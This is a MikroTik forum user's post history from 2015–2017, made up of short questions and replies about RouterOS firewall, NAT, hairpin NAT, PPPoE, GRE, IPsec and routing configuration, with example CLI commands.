Fri Apr 07, 2017 10:04 am
Forum: Beginner Basics
Topic: Easy one here! Firewall rule
Replies: 6
Views: 733

Re: Easy one here! Firewall rule

Hello, just add a firewall rule like this :

/ip firewall filter
add action=drop chain=forward dst-address=192.168.1.0/24 src-address=10.0.0.0/24


Be sure to put it before your accept rule.

Regards,
by evince
Tue Mar 14, 2017 12:10 pm
Forum: General
Topic: MikroTik to Sonicwall IPSec VPN
Replies: 1
Views: 771

Re: MikroTik to Sonicwall IPSec VPN

Hello, you should post your config if you want help.

Regards,
by evince
Tue Mar 14, 2017 12:06 pm
Forum: General
Topic: PPTP server bad prefix error
Replies: 1
Views: 517

Re: PPTP server bad prefix error

Hello, try adding /32 in your route = 10.6.6.254/32 or something else = 10.6.6.0/24
by evince
Tue Feb 14, 2017 12:19 pm
Forum: Beginner Basics
Topic: Outgoing port 9 for port 2 (second ISP line)
Replies: 3
Views: 458

Re: Outgoing port 9 for port 2 (second ISP line)

Hello, you ca do like this : /ip firewall mangle add action=mark-routing chain=prerouting log-prefix=MANGLE new-routing-mark=To_WAN2 passthrough=no src-address=xxx.xxx.xxx.xxx where xxx.xxx.xxx.xxx is the ip address of your server and add a default route /ip route add disabled=yes distance=1 gateway...
by evince
Sat Feb 11, 2017 2:51 pm
Forum: Beginner Basics
Topic: Problem with port forward
Replies: 12
Views: 3535

Re: Problem with port forward

Hello, your webserver is now reachable, i can display it. If you want to open from your local network, you will need HAIRPIN http://wiki.mikrotik.com/wiki/Hairpin_NAT

Regards,
by evince
Fri Feb 10, 2017 5:13 pm
Forum: Beginner Basics
Topic: Problem with port forward
Replies: 12
Views: 3535

Re: Problem with port forward

There i a mistake in your NAt rule : 1 chain=dstnat action=dst-nat to-addresses=192.168.10.110 to-ports=80 protocol=tcp dst-address=192.168.10.110 dst-port=80 log=no Shoud be 1 chain=dstnat action=dst-nat to-addresses=192.168.10.110 to-ports=80 protocol=tcp dst-address=xxx.xxx.xxx.xxx dst-port=80 lo...
by evince
Fri Feb 10, 2017 12:16 pm
Forum: Beginner Basics
Topic: [SOLVED] Problem gre after PPPoE
Replies: 1
Views: 603

Re: Problem gre after PPPoE

Ok i have found, here is the correct value :

/ip firewall mangle
add chain=forward protocol=tcp tcp-flags=syn action=change-mss new-mss=1400

Regards,
by evince
Fri Feb 10, 2017 12:14 pm
Forum: General
Topic: MTU for pppoe dialer, GRE tunnel encrypted with IPSEC
Replies: 2
Views: 1936

Re: MTU for pppoe dialer, GRE tunnel encrypted with IPSEC

Thank you for your help, your solution is working :)

/ip firewall mangle
add chain=forward protocol=tcp tcp-flags=syn action=change-mss new-mss=1400
by evince
Thu Feb 09, 2017 6:37 pm
Forum: Beginner Basics
Topic: [SOLVED] Problem gre after PPPoE
Replies: 1
Views: 603

[SOLVED] Problem gre after PPPoE

Dear all, here is the schema : modem bridge ==> Mikrotik RB2011 UAS-RM (v6.38.1) client <==> Fortigate There is a gre tunnel between mikrotik and fortigate. All the trafic is routed to the Fortigate But i have a problem, some websites (HTTPS essentialy) won't open.I have the problem only through GRE...
by evince
Tue Jan 31, 2017 4:05 pm
Forum: General
Topic: Very confusing DHCP issue
Replies: 31
Views: 2447

Re: Very confusing DHCP issue

Have a look at your linksys configuration. According to the image it has same IP as the mikrotik.
It is normal :

" This is the configuration on the WAN side. Ignore the fact that it shows Linksys - this was a screenshot taken before swapping the Linksys to a Mikrotik.
LinksysNetworkConfig.jpg "
by evince
Tue Jan 31, 2017 3:44 pm
Forum: General
Topic: Removing port number from CLI rule
Replies: 2
Views: 435

Re: Removing port number from CLI rule

Hello, here is the way :

ip firewall filter print
edit [number of the line]
value-name: dst-port (then press Enter)
just erase the line 500
CTRL+O to save and quit

Regards,
by evince
Fri Dec 16, 2016 4:42 pm
Forum: General
Topic: RB3011 VLAN config problem
Replies: 5
Views: 954

Re: RB3011 VLAN config problem

Hello, your config should be something like this :

/interface vlan

add interface=ether5 name=vlan-pppoe vlan-id=7

/interface pppoe-client
add disabled=no interface=vlan-pppoe max-mru=1480 max-mtu=1480 mrru=1600 name=pppoepassword=****** user=******
by evince
Mon Nov 21, 2016 4:56 pm
Forum: Scripting
Topic: Monitor pppoe-client
Replies: 2
Views: 748

Re: Monitor pppoe-client

Thank you for your help, but i receive too many emails (connecting, ... disconnected,...)

A single mail with status=connected/disconnected would be great :)
by evince
Thu Nov 17, 2016 4:15 pm
Forum: Scripting
Topic: Monitor pppoe-client
Replies: 2
Views: 748

Monitor pppoe-client

Dear all, here is the scenario. 1 PPPoe-client with static IP (main connection) and 1 pppoe-client with dynamic IP. If the main connection goes down, the backup line automaticaly runs. What i'd like is monitor dynamic pppoe-client, if it goes down, it send me an email. And when it come back up, the ...
by evince
Wed Oct 26, 2016 1:07 pm
Forum: Beginner Basics
Topic: Problem with command
Replies: 3
Views: 521

Re: Problem with command

Hello,

Here is an example :

/queue simple
add limit-at=10M/30M max-limit=10M/30M name=queue1 target=bridge-local

Regards,
by evince
Mon Oct 24, 2016 12:31 pm
Forum: Beginner Basics
Topic: Problem with command
Replies: 3
Views: 521

Re: Problem with command

You have an error in your syntax, please use first "add" command.

Regards,
by evince
Fri Aug 26, 2016 3:39 pm
Forum: General
Topic: DHCP over GRE Tunnel
Replies: 6
Views: 1464

Re: DHCP over GRE Tunnel

Hello pe1chl,

I'm not able to achieve ths scenario. I have read some tutorials and i could see i need to activate dhcp relay on Site2.

I have never do this, so please be patient :)

Thank you in advance,
by evince
Mon Aug 22, 2016 6:01 pm
Forum: General
Topic: DHCP over GRE Tunnel
Replies: 6
Views: 1464

Re: DHCP over GRE Tunnel

Ok thank you for your help, i'll try this :)
by evince
Mon Aug 22, 2016 5:44 pm
Forum: General
Topic: DHCP over GRE Tunnel
Replies: 6
Views: 1464

Re: DHCP over GRE Tunnel

Hello, the problem is that i can not choose the gre interface in the drop list (interface).

Regards,
by evince
Mon Aug 22, 2016 5:05 pm
Forum: General
Topic: DHCP over GRE Tunnel
Replies: 6
Views: 1464

DHCP over GRE Tunnel

Dear all, I'm running gre tunnels with Fortinet Firewall (Hub VNP). I'd like to know how to set up a DHCP relay. The schema is quite simple : Site1 (Mikrotik) ==> Fortinet (UTM) ==> Site 2 MKT The DHCP server should give addresses from Site1 to Site2 If someone could help me? Thank you in advance, K...
by evince
Mon Aug 22, 2016 10:50 am
Forum: General
Topic: IP Cloud, Request time out
Replies: 4
Views: 1737

Re: IP Cloud, Request time out

Hello,

Be sure you set up DNS server(s). Try to ping e.g : google.com from terminal.

Regards,
by evince
Fri Jun 17, 2016 12:32 pm
Forum: Beginner Basics
Topic: dhcp offered from wrong/parent network
Replies: 2
Views: 574

Re: dhcp offered from wrong/parent network

Why do not turning off DHCP on msf uplink and fix an IP on your msf-AP1?

2 DHCP on a network is never advisable.
by evince
Wed Jun 15, 2016 12:03 pm
Forum: Beginner Basics
Topic: Upgrade router from v5.11 to v6.32.4
Replies: 7
Views: 2391

Re: Upgrade router from v5.11 to v6.32.4

When you update the firmware, you have to check if there is a new routerboard. You can see it at /system routerboard
by evince
Wed Jun 15, 2016 10:54 am
Forum: General
Topic: Tapatalk and Karma
Replies: 60
Views: 4837

Re: Tapatalk and Karma

I did not use something special, i just woul'd answer with an URL and here is what appears
by evince
Wed Jun 15, 2016 10:05 am
Forum: General
Topic: Tapatalk and Karma
Replies: 60
Views: 4837

Re: Tapatalk and Karma

Here is a screenshot : Image

Regards,
by evince
Wed Jun 15, 2016 9:49 am
Forum: General
Topic: Tapatalk and Karma
Replies: 60
Views: 4837

Re: Tapatalk and Karma

Hello Normis,

As you can see there is a problem with text formatting, We can see HTML tags.

Regards,
by evince
Tue Jun 14, 2016 5:56 pm
Forum: General
Topic: Tapatalk and Karma
Replies: 60
Views: 4837

Re: Tapatalk and Karma

Trying to reply, and here is how it looks :  Hello, You can download your firmware image from here :  http://www.mikrotik.com/download Then, just drop the file into your router and reboot it. Do not forget to upgrade routerboard too. The difference between  RB951G-2HnD &  RB751G-2HnD is CPU and memo...
by evince
Tue Jun 14, 2016 5:47 pm
Forum: Beginner Basics
Topic: Upgrade router from v5.11 to v6.32.4
Replies: 7
Views: 2391

Re: Upgrade router from v5.11 to v6.32.4

Hello, You can download your firmware image from here : http://www.mikrotik.com/download Then, just drop the file into your router and reboot it. Do not forget to upgrade routerboard too. The difference between RB951G-2HnD & RB751G-2HnD is CPU and memory (in large) Before restore your backup from RB...
by evince
Tue Jun 14, 2016 5:37 pm
Forum: Beginner Basics
Topic: Can't connect to router via web browser
Replies: 2
Views: 1787

Re: Can't connect to router via web browser

Hello,

Check if www is enabled in /ip services, then be sure there is not any drop rule thant can block input trafic on http
by evince
Fri Jun 03, 2016 1:36 pm
Forum: Beginner Basics
Topic: couldnt connect to the router
Replies: 6
Views: 876

Re: couldnt connect to the router

Do you have any firewall rule that can black incoming trafic from your IP to the router?

Maybe, try to change your local IP and try again
by evince
Thu Jun 02, 2016 1:18 pm
Forum: Beginner Basics
Topic: couldnt connect to the router
Replies: 6
Views: 876

Re: couldnt connect to the router

Hello, try to reinstall RouterOS via NetInstall : http://wiki.mikrotik.com/wiki/Manual:Netinstall
by evince
Thu Jun 02, 2016 9:36 am
Forum: Beginner Basics
Topic: I wonder if this can be done in mikrotik.
Replies: 5
Views: 727

Re: I wonder if this can be done in mikrotik.

Hello, if you want to reach vlan's on mikrotik 2 from vlan's on mikrotik 1, then you'll need to configure ip route.

Regards,
by evince
Tue May 31, 2016 10:29 am
Forum: General
Topic: RouterBoard 951 problem
Replies: 1
Views: 283

Re: RouterBoard 951 problem

Hello, try to reinstall your routerboard, just follow these steps :
http://wiki.mikrotik.com/wiki/Manual:Netinstall
by evince
Mon May 30, 2016 5:05 pm
Forum: Beginner Basics
Topic: Please help a total noob. Basic config.
Replies: 11
Views: 1375

Re: Please help a total noob. Basic config.

Hello, do you have a bridge for your internal network? Whih interface has been assigned for your LAN? /ip address

In your DHCP client, do you have a default route?
by evince
Mon May 30, 2016 3:17 pm
Forum: General
Topic: PPTP
Replies: 2
Views: 354

Re: PPTP

Hello, this is the default configuration. if you want your own gateway, you have to change it in the properties of your NIC, and then add a route to join your remote subnet.
by evince
Thu May 26, 2016 3:12 pm
Forum: General
Topic: Problem with cloud,Connect to modem instead connect to Mikrotik
Replies: 11
Views: 733

Re: Problem with cloud,Connect to modem instead connect to Mikrotik

Wich port are you trying to reach?
by evince
Thu May 26, 2016 1:02 pm
Forum: General
Topic: Problem with cloud,Connect to modem instead connect to Mikrotik
Replies: 11
Views: 733

Re: Problem with cloud,Connect to modem instead connect to Mikrotik

So, if you set DMZ, you do not need a NAT rule, but a Firewall rule in INPUT chain for Winbox.
by evince
Thu May 26, 2016 11:52 am
Forum: General
Topic: Problem with cloud,Connect to modem instead connect to Mikrotik
Replies: 11
Views: 733

Re: Problem with cloud,Connect to modem instead connect to Mikrotik

Why do not put your modem in bridge mode and activatte pppoe client on your mikrotik? Or use DMZ?
by evince
Thu May 26, 2016 11:45 am
Forum: Beginner Basics
Topic: help please.....
Replies: 5
Views: 675

Re:

Wlan should be an access point? It is in station mode... Read the manual and set it as Ap bridge.
Jarda is right, just switch to ap bridge and your SSID will appear.
by evince
Thu May 26, 2016 10:42 am
Forum: Beginner Basics
Topic: config 2 wan and 1 lan - Dividing users to use the Internet's wan
Replies: 2
Views: 2762

Re: config 2 wan and 1 lan - Dividing users to use the Internet's wan

Hello, it can look like this : /ip firewall address-list add address=192.168.10.124 list=Use_WAN1 add address=192.168.10.184 list=Use_WAN1 add address=192.168.10.0/24 list=Use_WAN2 /ip firewall mangle add action=mark-routing chain=prerouting comment="Use WAN1" disabled=no log=no log-prefix="" new-ro...
by evince
Tue May 24, 2016 1:08 pm
Forum: Beginner Basics
Topic: help please.....
Replies: 5
Views: 675

Re: help please.....

Hello, we can not see anything on your picture, post a bigger please or export your config.
by evince
Sat May 14, 2016 7:41 pm
Forum: Beginner Basics
Topic: No internet Access on LAN
Replies: 3
Views: 899

Re: No internet Access on LAN

src-nat is working as packets are Firewall Filters. If needed, disable all drop rule and test again. You should find where the problem is.
by evince
Wed May 11, 2016 9:35 am
Forum: General
Topic: Remote connect to mikrotik behind NAT
Replies: 15
Views: 14200

Re: Remote connect to mikrotik behind NAT

Hello, go to PPP, and then add a pptp (or l2tp) client. Configure it to connect to your server using your credentials.
by evince
Tue May 10, 2016 5:37 pm
Forum: General
Topic: Remote connect to mikrotik behind NAT
Replies: 15
Views: 14200

Re: Remote connect to mikrotik behind NAT

Hello, it is not possible as your ISP provide you private ip address, so you are Natted.

You need to ask him for a public IP (it can be dynamic), but the risk is to pay more than now.
by evince
Mon May 02, 2016 6:16 pm
Forum: Beginner Basics
Topic: 2 WAN - Masquerade - Howto?
Replies: 5
Views: 1040

Re: 2 WAN - Masquerade - Howto?

Heelo, this one is the right :


chain=srcnat action=masquerade out-interface=ether1-gateway log=no log-prefix=""
chain=srcnat action=masquerade out-interface=ether2- gateway 2 log=no log-prefix=""

regards,
by evince
Mon May 02, 2016 6:13 pm
Forum: Beginner Basics
Topic: Can't access Internal Servers from WAN
Replies: 9
Views: 945

Re: Can't access Internal Servers from WAN

Hello,

try disabling this rule and test again :

add action=drop chain=forward connection-nat-state=!dstnat connection-state=new in-interface=ether1-Iplan
by evince
Mon May 02, 2016 2:25 pm
Forum: Beginner Basics
Topic: HOTSPOT login
Replies: 2
Views: 567

Re: HOTSPOT login

by evince
Fri Apr 29, 2016 3:43 pm
Forum: General
Topic: [SOLVED] HAIRPIN NAT not working
Replies: 23
Views: 17663

Re: HAIRPIN NAT not working

Ok, tahk you very much for your great help ;)
by evince
Fri Apr 29, 2016 3:19 pm
Forum: General
Topic: [SOLVED] HAIRPIN NAT not working
Replies: 23
Views: 17663

Re: HAIRPIN NAT not working

Your rule has in-interface=pppoe-explore. It won't match connections coming from LAN. Change it to: dst-address-type=local dst-address=!192.168.88.1 Ok i've added a new rule with your settings and it is working now, thank you :) Can you explain me wy a simple hairpin nat rule does not work anymore?
by evince
Fri Apr 29, 2016 3:16 pm
Forum: General
Topic: [SOLVED] HAIRPIN NAT not working
Replies: 23
Views: 17663

Re: HAIRPIN NAT not working

Hello, this rule is there to access the camero from outside (pppoe-explore)
by evince
Fri Apr 29, 2016 2:27 pm
Forum: General
Topic: [SOLVED] HAIRPIN NAT not working
Replies: 23
Views: 17663

Re: HAIRPIN NAT not working

Hello, here is : /ip firewall nat add action=masquerade chain=srcnat dst-address=192.168.88.129 src-address=192.168.88.0/24 add action=masquerade chain=srcnat out-interface=pppoe-explore src-address=192.168.88.0/24 add action=dst-nat chain=dstnat dst-port=80 in-interface=pppoe-explore protocol=tcp t...
by evince
Fri Apr 29, 2016 10:53 am
Forum: General
Topic: [SOLVED] HAIRPIN NAT not working
Replies: 23
Views: 17663

[SOLVED] HAIRPIN NAT not working

Hi all, i'm facing an issue with Hairpin. I have a basic setup (from scratch). Local lan : 192.168.88.0/24 Gateway : 192.168.88.1 WAN via PPPoE (IP 100.100.100.100) Version : 6.35 I have a NAT rule for direct acces to a camera, it is workin from outside. By the way, i i try to reach it from my local...
by evince
Wed Apr 27, 2016 9:54 am
Forum: Beginner Basics
Topic: RB2011UiAS-RM with 6.30.4 OS can't connect to internet
Replies: 10
Views: 1466

Re: RB2011UiAS-RM with 6.30.4 OS can't connect to internet

It depends how many Ethernet ports are used. What kind of socket are you talking about?
by evince
Tue Apr 26, 2016 1:24 pm
Forum: Beginner Basics
Topic: RB2011UiAS-RM with 6.30.4 OS can't connect to internet
Replies: 10
Views: 1466

Re: RB2011UiAS-RM with 6.30.4 OS can't connect to internet

Hello, This setup is quite simple. You should receive an ip address from your modem in ether1(mikrotik side) (in your dhcp-client). Check if default route in checked. Then, you should have a NAT rule (masquerade) out-interface=ether1. Then, you should have a default route to the ip address of your m...
by evince
Mon Apr 18, 2016 4:37 pm
Forum: Beginner Basics
Topic: Forward to Proxy
Replies: 4
Views: 503

Re: Forward to Proxy

Hello, try this :

chain=dstnat action=dst-nat to-addresses=62.23.15.92 to-ports=3128 protocol=tcp src-address=192.168.88.0/24 log=no log-prefix=""
by evince
Mon Apr 18, 2016 3:06 pm
Forum: Beginner Basics
Topic: Forward to Proxy
Replies: 4
Views: 503

Re: Forward to Proxy

Hello,

What you need is a transparent proxy. take a look at this : http://wiki.mikrotik.com/wiki/Manual:IP ... on_example

Regards,
by evince
Thu Apr 07, 2016 4:32 pm
Forum: Beginner Basics
Topic: NetWatch with VPN and PPPOE
Replies: 4
Views: 833

Re: NetWatch with VPN and PPPOE

Hello,

Be sure ICMP is authorized in input.
by evince
Thu Apr 07, 2016 10:45 am
Forum: Beginner Basics
Topic: NetWatch with VPN and PPPOE
Replies: 4
Views: 833

Re: NetWatch with VPN and PPPOE

Hello,

Just add a route dst-address=remote_subnet Gateway=bridge-local. Your Netwatch will work.

regards,
by evince
Wed Mar 16, 2016 11:14 am
Forum: Beginner Basics
Topic: Installation package
Replies: 2
Views: 543

Re: Installation package

Hello, download your package and just drag/drop it to your router, then reboot it.

Regards,
by evince
Tue Mar 15, 2016 9:45 am
Forum: Beginner Basics
Topic: HTTP access to userman only
Replies: 2
Views: 509

Re: HTTP access to userman only

Hello, if you want to reach usermanager, you need this URL : http://mikrotik_ip/userman

Regards,
by evince
Wed Mar 09, 2016 9:54 am
Forum: Beginner Basics
Topic: NAT port forwarding problems
Replies: 3
Views: 1113

Re: NAT port forwarding problems

Hello,

Your NAt rules are false. You need to set dst-port instead of src-port.

Kind Regards,
by evince
Mon Feb 29, 2016 12:55 pm
Forum: Beginner Basics
Topic: L2TP over IPsec not working
Replies: 2
Views: 701

Re: L2TP over IPsec not working

Hello, change you input firewall rule with destination port 1701. It must be UDP instead of TCP.
by evince
Fri Feb 26, 2016 4:01 pm
Forum: General
Topic: MikroTik IPSEC Site-2-site to Sonicwall : specifications
Replies: 3
Views: 1946

Re: MikroTik IPSEC Site-2-site to Sonicwall : specifications

Hello,

I'm running IPSec VPN between Mikrotik and SonicWall without any problem. Here is my config :

- Passive : enabled
- Send Initial Contact : enabled
- Generate policy : no

You just need to match both phase1 and phase2 and all wil rock :

Regards,
by evince
Thu Jan 28, 2016 5:12 pm
Forum: Beginner Basics
Topic: IPSec tunnel connects, but unable to ping or connect to remote network [SOLVED]
Replies: 12
Views: 2851

Re: IPSec tunnel connects, but unable to ping or connect to remote network

Did you change your encryption domain in your IPSec policy?
by evince
Wed Jan 27, 2016 11:57 am
Forum: General
Topic: IP Cloud
Replies: 113
Views: 66480

Re: IP Cloud

Hello,

IP Cloud is a great feature, btw how to assign it to another interface if i run 2 ISP?

Thank you in advance,
by evince
Wed Jan 27, 2016 11:29 am
Forum: Beginner Basics
Topic: IPSec tunnel connects, but unable to ping or connect to remote network [SOLVED]
Replies: 12
Views: 2851

Re: IPSec tunnel connects, but unable to ping or connect to remote network

Hello,

Can you post your NAT rules? YOu need at least one on the top.

Take a look at this great guide : http://gregsowell.com/?p=787

Regards,
by evince
Mon Jan 18, 2016 12:13 pm
Forum: Beginner Basics
Topic: Separate IP ranges with CRS125 not really separated
Replies: 2
Views: 457

Re: Separate IP ranges with CRS125 not really separated

Hello,

It's because you do not have a forward chain in DROP.
by evince
Mon Dec 28, 2015 4:16 pm
Forum: Beginner Basics
Topic: Routing to website inside my network
Replies: 3
Views: 839

Re: Routing to website inside my network

Yes of course, no problem :)
by evince
Mon Dec 28, 2015 1:26 pm
Forum: Beginner Basics
Topic: Routing to website inside my network
Replies: 3
Views: 839

Re: Routing to website inside my network

Hello, you have to create a Hairpin NAT rule, take a look at this : http://wiki.mikrotik.com/wiki/Hairpin_NAT

Regards,
by evince
Mon Dec 28, 2015 1:23 pm
Forum: Beginner Basics
Topic: Simple Queue problem
Replies: 3
Views: 858

Re: Simple Queue problem

Hello,

Edit your simple queue, go to Advanced tab and configure Target Upload and Target Download as in General Tab.

Regards,
by evince
Wed Dec 16, 2015 10:42 am
Forum: Wireless Networking
Topic: broadcasting an unwanted wifi network
Replies: 6
Views: 941

Re: broadcasting an unwanted wifi network

Check your wlan interface, there is maybe a virtual
by evince
Wed Dec 16, 2015 10:35 am
Forum: General
Topic: trying to add website to wallgarden - won't open it
Replies: 5
Views: 631

Re: trying to add website to wallgarden - won't open it

Hello,

In dst-host, try without http://
by evince
Tue Dec 08, 2015 6:02 pm
Forum: Beginner Basics
Topic: why log menu show single line ? how to config it
Replies: 2
Views: 567

Re: why log menu show single line ? how to config it

Hello, take a look at system logging action memory, you can increase the number of lines.

Regards,
by evince
Mon Dec 07, 2015 2:55 pm
Forum: General
Topic: Port forwarding issue
Replies: 4
Views: 695

Re: Port forwarding issue

Hello, take a look at this rule and change it like this :

add chain=forward comment="RDP" dst-port=53389 protocol=tcp

replace with this :
add chain=forward comment="RDP" dst-port=3389 protocol=tcp


Regards,
by evince
Fri Dec 04, 2015 4:23 pm
Forum: The Dude
Topic: The Dude is back! v6.34rc test build released
Replies: 269
Views: 74334

Re: The Dude is back! v6.34rc test build released

Happy to see that the Dude project is not dead :)
by evince
Mon Nov 30, 2015 1:26 pm
Forum: Beginner Basics
Topic: Open port
Replies: 2
Views: 594

Re: Open port

Hello,

You need to add HAIRPIN NAT rule, see this : http://wiki.mikrotik.com/wiki/Hairpin_NAT

Regards,
by evince
Mon Nov 30, 2015 9:51 am
Forum: Beginner Basics
Topic: IPsec VPN site to site
Replies: 3
Views: 1702

Re: IPsec VPN site to site

Helle,

The src-address seems to be wrong, we can see in your logs 192.168.1.2. It should be a WAN IP.

Regards,
by evince
Wed Nov 25, 2015 1:33 pm
Forum: Beginner Basics
Topic: After enable Port 80 can not access router setting
Replies: 3
Views: 466

Re: After enable Port 80 can not access router setting

Hello, how did you configure your router the first time? via webfig or winbox?

Maybe you just disabled the www service instead of activate it.

Try to connectwith winbox and take a look at /ip services
by evince
Tue Nov 24, 2015 12:22 pm
Forum: Beginner Basics
Topic: loopback
Replies: 1
Views: 577

Re: loopback

Hello, you have to add a NAT rule for HAIRPIN : http://wiki.mikrotik.com/wiki/Hairpin_NAT

Kind Regards,
by evince
Tue Nov 24, 2015 10:22 am
Forum: General
Topic: NAT'ing internal segment to Public IP
Replies: 1
Views: 310

Re: NAT'ing internal segment to Public IP

Hello, you are right, it's quite simple :)

/ip firewall nat
add action=src-nat chain=srcnat comment="NAT to 3.3.3.3" src-address=10.0.30.0/24 to-addresses=3.3.3.3

King Regards,
by evince
Mon Nov 23, 2015 11:28 am
Forum: General
Topic: Please, add the "Taskbar" in Winbox :)
Replies: 3
Views: 992

Re: Please, add the "Taskbar" in Winbox :)

+1 :D
by evince
Tue Nov 17, 2015 4:04 pm
Forum: Beginner Basics
Topic: Help needed - Unable to get WAN working
Replies: 5
Views: 866

Re: Help needed - Unable to get WAN working

Hello, i don't realy understand your config :)

Try this : disable Ip address on WAN2 and enable dhcp client on this interface (WAN2). Do not understand to check the default route box.

Then you should receive an ip with a route.
by evince
Tue Nov 17, 2015 1:43 pm
Forum: Beginner Basics
Topic: Help needed - Unable to get WAN working
Replies: 5
Views: 866

Re: Help needed - Unable to get WAN working

Hello,

Check your default route, your gateway is 192.168.0.4 it should be 192.168.0.1 (modem address). Or in /ip address, your WAN2 address is wrong.
by evince
Fri Nov 13, 2015 11:44 am
Forum: Beginner Basics
Topic: Port Forward Nightmare
Replies: 15
Views: 2092

Re: Port Forward Nightmare

Hello,

Try to disable some Drop filter rule and see if it works after that. You can check the logs too.
by evince
Thu Nov 12, 2015 12:08 pm
Forum: Beginner Basics
Topic: The interface Winbox no buttons PPP.
Replies: 1
Views: 265

Re: The interface Winbox no buttons PPP.

Hello,

Be sure you have ppp package installed. You can too upgrade your winbow version to the latest (v.3)

Regards,
by evince
Tue Nov 10, 2015 11:46 am
Forum: Beginner Basics
Topic: Pleae check my NAT - new in MikroTik
Replies: 2
Views: 381

Re: Pleae check my NAT - new in MikroTik

Hello, in your NAT rules, you need to specify dst-address or in-interface.

You need fileter rule if you have a drop in forward.

Regards,
by evince
Thu Nov 05, 2015 11:47 am
Forum: General
Topic: VPN Connection from Fritz!Box 7490 to Mikrotik Router
Replies: 3
Views: 4884

Re: VPN Connection from Fritz!Box 7490 to Mikrotik Router

Hello,

You are in the wrong way. if you want to set up a VPN connection, you have to choose LAN to LAN linkup option.

If you want to change the language, just go to Settings, then Sprasche (or something like this).

regards,
by evince
Mon Oct 26, 2015 12:40 pm
Forum: Beginner Basics
Topic: PPTP Client - cant ping server
Replies: 3
Views: 456

Re: PPTP Client - cant ping server

Heelo,

Set proxy-arp on your local bridge, and then try to ping again.

Regards,
by evince
Fri Oct 23, 2015 4:31 pm
Forum: Beginner Basics
Topic: Firewall rule for allow access only from a specific ip address.
Replies: 3
Views: 8667

Re: Firewall rule for allow access only from a specific ip address.

Heelo,

Just add your address 91.xxx.xxx.xx in src-address.

Regards,
by evince
Fri Oct 09, 2015 11:57 am
Forum: General
Topic: Problem with GRE tunnel
Replies: 3
Views: 629

Re: Problem with GRE tunnel

Hello,

It's looks like a drop rule in forward.

Please past your filter rules in order to help you.
by evince
Tue Oct 06, 2015 9:48 am
Forum: Beginner Basics
Topic: IP Accounting Web Access not Working
Replies: 2
Views: 2114

Re: IP Accounting Web Access not Working

Hello,

First check if www service is running, then be sure your computer IP is 192.168.1.100

Regards,
by evince
Mon Oct 05, 2015 10:13 pm
Forum: Beginner Basics
Topic: Newbie Need help with Mikrotik RB750GL Router (Security Camera / DVR) setup
Replies: 4
Views: 537

Re: Newbie Need help with Mikrotik RB750GL Router (Security Camera / DVR) setup

No, your in-terface must be the WAN, not your local-bridge
by evince
Mon Oct 05, 2015 6:24 pm
Forum: Beginner Basics
Topic: Newbie Need help with Mikrotik RB750GL Router (Security Camera / DVR) setup
Replies: 4
Views: 537

Re: Newbie Need help with Mikrotik RB750GL Router (Security Camera / DVR) setup

Hello, Here is how to do : /ip firewall nat add action=dst-nat chain=dstnat dst-port=9000 in-interface=WAN1 protocol=tcp to-addresses=192.168.10.3 to-ports=9000 add action=dst-nat chain=dstnat dst-port=8000 in-interface=WAN1 protocol=tcp to-addresses=192.168.10.3 to-ports=8000 Just adjust your WAN i...
by evince
Mon Oct 05, 2015 6:19 pm
Forum: Beginner Basics
Topic: RouterBOARD 1100 X2 AH - PPTP?
Replies: 1
Views: 604

Re: RouterBOARD 1100 X2 AH - PPTP?

Heelo,

Post your NAT and filter rules please.
by evince
Mon Oct 05, 2015 6:17 pm
Forum: Beginner Basics
Topic: Need assistance with port forwarding rules. Dynamic
Replies: 1
Views: 519

Re: Need assistance with port forwarding rules. Dynamic

Hello, check your NAT rules : /ip firewall nat add action=masquerade chain=srcnat out-interface=ether1 add action=dst-nat chain=dstnat dst-address-type=local dst-port=8006 protocol=tcp to-addresses=192.168.1.6 to-ports=8006 add action=dst-nat chain=dstnat dst-port=1002 log=yes log-prefix=proxmox pro...
by evince
Mon Oct 05, 2015 6:08 pm
Forum: Beginner Basics
Topic: Mikrotik massively add static routes
Replies: 3
Views: 355

Re: Mikrotik massively add static routes

Hello, just past those line in terminal (adjust for your configuration )

/ip route
add disabled=yes distance=1 dst-address=10.10.20.0/24 gateway=10.20.20.2
add disabled=yes distance=1 dst-address=10.20.20.0/24 gateway=10.20.20.2
......


Regards,
by evince
Mon Oct 05, 2015 10:54 am
Forum: The Dude
Topic: The Dude and RoS6.25+
Replies: 7
Views: 4495

Re: The Dude and RoS6.25+

Any news regarding this issue?
by evince
Mon Sep 28, 2015 3:43 pm
Forum: Beginner Basics
Topic: Monitor a port
Replies: 2
Views: 391

Re: Monitor a port

Hello,

to monitor a port, try this :

/ip firewall filter
add action=log chain=forward dst-port=8883 protocol=tcp

Regards,
by evince
Mon Sep 28, 2015 1:27 pm
Forum: General
Topic: My settings Reset to factory default every time after reboot the router
Replies: 7
Views: 3157

Re: My settings Reset to factory default every time after reboot the router

Hello,

First try to update your firmware and routerboard then try a factory reset from the router ( system reset-configuration ).

Then, try a modification in your router and reboot it.

Regards,
by evince
Mon Sep 28, 2015 10:43 am
Forum: General
Topic: Cannot get port forwarding to work
Replies: 7
Views: 1137

Re: Cannot get port forwarding to work

Hello,

Lety me know what kind of proble you have now and i'll try to help you :)à
by evince
Thu Sep 24, 2015 1:38 pm
Forum: General
Topic: Cannot get port forwarding to work
Replies: 7
Views: 1137

Re: Cannot get port forwarding to work

Hello,

Flags: X - disabled, I - invalid, D - dynamic
0 chain=dstnat action=dst-nat to-addresses=192.168.1.140 to-ports=9000
protocol=tcp dst-address=80.229.xxx.xxx in-interface=bridge-local
dst-port=9000 log=no log-prefix=""

Do not specify in interface and test again from outside.
by evince
Mon Sep 21, 2015 12:22 pm
Forum: General
Topic: Cannot get port forwarding to work
Replies: 7
Views: 1137

Re: Cannot get port forwarding to work

Hello,

Please post here your Firewall and NAt rules.
by evince
Fri Jul 24, 2015 1:01 pm
Forum: Announcements
Topic: v6.30.2 bugfix release
Replies: 148
Views: 38177

Re: v6.30.2 bugfix release

Perhaps it makes sense to make the setting "allow firmware autoupgrade when upgrade ROS"?

+1
by evince
Thu Jul 23, 2015 6:25 pm
Forum: Beginner Basics
Topic: Allowed access to my network from internet only for some IP
Replies: 1
Views: 351

Re: Allowed access to my network from internet only for some IP

Hello, It is quite simple. just create an address list in /ip firewall address-list and a firewall rule like this : /ip firewall address-list add address=x.x.x.x list=Management add address=x.x.x.x list=Management add address=x.x.x.x list=Management /ip firewall filter add chain=input comment="Allow...
by evince
Tue May 19, 2015 5:14 pm
Forum: General
Topic: Webfig - How to move Firewall rules???
Replies: 3
Views: 2559

Re: Webfig - How to move Firewall rules???

With v6 it is wrking
by evince
Thu Apr 23, 2015 10:29 pm
Forum: Beginner Basics
Topic: Help with this configuration.
Replies: 17
Views: 1312

